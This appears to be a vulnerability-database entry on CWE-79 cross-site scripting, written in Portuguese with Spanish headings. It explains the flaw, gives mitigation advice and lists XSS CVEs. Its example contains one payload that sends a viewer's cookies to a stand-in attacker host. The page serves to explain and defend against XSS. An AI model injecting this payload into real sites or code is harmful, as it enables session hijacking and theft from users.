Fallos del tipo CWE-79

28.652 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-0643—Bank Mellat <= 1.3.7 - Reflected Cross-Site ScriptingEPSS 0.8%CVE-2021-24984—WPFront User Role Editor < 3.2.1.11184 - Reflected Cross-Site ScriptingEPSS 0.8%CVE-2022-0892—Export All URLs < 4.2 - Reflected Cross-Site ScriptingEPSS 0.8%CVE-2022-0449—Flexi - Guest Submit < 4.20 - Reflected Cross-Site ScriptingEPSS 0.8%CVE-2021-25047—10Web Social Photo Feed < 1.4.29 - Reflected Cross-Site Scripting (XSS)EPSS 0.8%CVE-2021-25038—Multisite User Sync/Unsync < 2.1.2 - Reflected Cross-Site ScriptingEPSS 0.8%CVE-2022-0625—Admin Menu Editor <= 1.0.4 - Reflected Cross-Site ScriptingEPSS 0.8%CVE-2022-1047—Themify - Post Type Builder Search Addon < 1.4.0 - Reflected Cross-Site ScriptingEPSS 0.8%CVE-2021-43808MEDIUMBlade `@parent` Exploitation Leading To Possible XSS in LaravelEPSS 0.8%CVE-2018-1000874MEDIUMPHP cebe markdown parser version 1.2.0 and earlier contains a Cross Site Scripting (XSS) vulnerability in all distributed parsers allowing aEPSS 0.8%CVE-2026-7027MEDIUMD-Link DSL-2740R Wireless Setup Section cross site scriptingEPSS 0.8%CVE-2025-7901MEDIUMyangzongzhuan RuoYi Swagger UI index.html cross site scriptingEPSS 0.8%CVE-2021-36901MEDIUMWordPress Age Gate plugin <= 2.17.0 - Unauthenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.8%CVE-2025-49543MEDIUMColdFusion | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.8%CVE-2025-49540MEDIUMColdFusion | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.8%CVE-2025-49541MEDIUMColdFusion | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.8%CVE-2025-24438HIGHAdobe Commerce | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.8%CVE-2022-23013—On BIG-IP DNS & GTM version 16.x before 16.1.0, 15.1.x before 15.1.4, 14.1.x before 14.1.4.4, and all versions of 13.1.x, 12.1.x, and 11.6.xEPSS 0.8%CVE-2019-25146HIGHDELUCKS SEO < 2.1.8 - Stored Cross Site ScriptingEPSS 0.8%CVE-2024-54996HIGHMonicaHQ v4.1.2 was discovered to contain multiple authenticated Client-Side Injection vulnerabilities via the title and description parametEPSS 0.8%